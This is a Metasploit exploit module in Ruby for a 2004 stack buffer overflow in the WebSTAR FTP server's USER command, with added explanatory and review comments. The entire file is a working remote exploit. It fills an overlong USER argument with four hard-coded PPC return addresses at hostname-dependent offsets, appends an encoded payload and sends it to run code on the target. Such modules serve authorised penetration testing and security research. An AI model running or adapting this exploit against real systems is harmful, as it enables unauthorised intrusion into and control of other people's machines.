##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for the WebSTAR FTP server USER-command stack
# overflow (CVE-2004-0695, OSVDB 7794, BID 10720), disclosed 2004-07-13.
#
# Structure: `initialize` only declares module metadata and options to the
# framework; `exploit` does the actual work over the FTP mixin
# (Msf::Exploit::Remote::Ftp). Rank, payload constraints and the single
# PPC / Mac OS X 10.3.4-10.3.6 target are all declared in `initialize`.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  # Registers module metadata with the framework.
  #
  # Notable declarations (all visible below):
  # - 'Payload' limits encoded payload space to 300 bytes and excludes
  #   NUL, space, LF and CR from the payload bytes ('BadChars').
  # - 'Targets' carries a single entry whose 'Rets' array holds the four
  #   System-library return addresses that `exploit` writes into the buffer.
  # - 'Notes' reliability/stability/side-effect ratings are all UNKNOWN_*.
  # - The optional MHOST string option overrides the address the module
  #   assumes the target resolves the client to; `exploit` uses its length
  #   to compute the overflow offset.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WebSTAR FTP Server USER Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the logging routine
          of the WebSTAR FTP server. Reliable code execution is
          obtained by a series of hops through the System library.
        },
        'Author' => [ 'ddz', 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-0695'],
          [ 'OSVDB', '7794'],
          [ 'BID', '10720'],
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 300,
          'BadChars' => "\x00\x20\x0a\x0d",
          'Compat' =>
          {
            'ConnectionType' => "+find"
          },
        },
        'Platform' => %w{osx},
        'Targets' => [
          [
            'Mac OS X 10.3.4-10.3.6',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              # Indexed 0..3 by `exploit`; see the per-write comments there.
              'Rets' => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],
            },
          ],
        ],
        'DisclosureDate' => '2004-07-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]),
      ], self
    )
  end

  # Original authors' sketch of the return-address chain; the four values
  # are the same ones stored in the target's 'Rets' array, in that order.
  #
  # crazy dino 5-hop foo
  # $ret = pack('N', 0x9008dce0); # call $r28, jump r1+120
  # $r28 = pack('N', 0x90034d60); # getgid()
  # $ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30
  # $r30 = pack('N', 0x90023590); # call $r3

  # Builds the overlong USER argument and sends it to the connected server.
  #
  # Flow: connect (FTP mixin) -> compute the hostname-dependent base offset
  # -> fill a random alphanumeric buffer, overwrite four 4-byte slots with
  # the target's 'Rets' (big-endian, pack('N')) and append the encoded
  # payload -> send USER then HELP -> start the payload handler -> disconnect.
  #
  # The slot positions (basel, basel+24, basel+120, basel+136) and the buffer
  # size are hand-tuned to the target's stack frame documented in the offset
  # table below; do not restyle or reorder these writes without re-verifying
  # against the target binary.
  #
  # @return [void]
  def exploit
    connect

    # The offset to the return address is dependent on the length of our hostname
    # as the target system resolves it ( IP or reverse DNS ).
    # MHOST, when set, replaces the locally derived source address for that
    # length computation only.
    mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST'])
    # NOTE(review): String#length counts characters; this matches bytes only for
    # an ASCII hostname/IP, which is presumably always the case here. A
    # resolved name longer than 285 characters would make basel negative and
    # the slot writes below index from the end of the buffer — not guarded.
    basel = 285 - mhost.length

    print_status("Trying target #{target.name}...")

    # Authors' stack-frame offset table (relative to the start of the
    # overflowed buffer, before the hostname-length adjustment):
    # ret = 296
    # r25 = 260
    # r26 = 264
    # r27 = 268
    # r28 = 272
    # r29 = 276
    # r30 = 280
    # r31 = 284

    # r1+120 = 408

    # Filler avoids the payload's bad characters so the whole USER argument
    # survives the server's input handling.
    buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
    buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
    buf[basel, 4] = [ target['Rets'][1] ].pack('N') # getgid()
    buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
    buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3
    # Encoded payload goes after the fixed-size filler; its length is bounded
    # by the 'Space' => 300 declared in initialize.
    buf << payload.encoded

    # Both commands are sent with the reply-wait flag; the trailing HELP
    # presumably forces the logging path that triggers the overflow — confirm.
    send_cmd(['USER', buf], true)
    send_cmd(['HELP'], true)

    handler
    disconnect
  end
end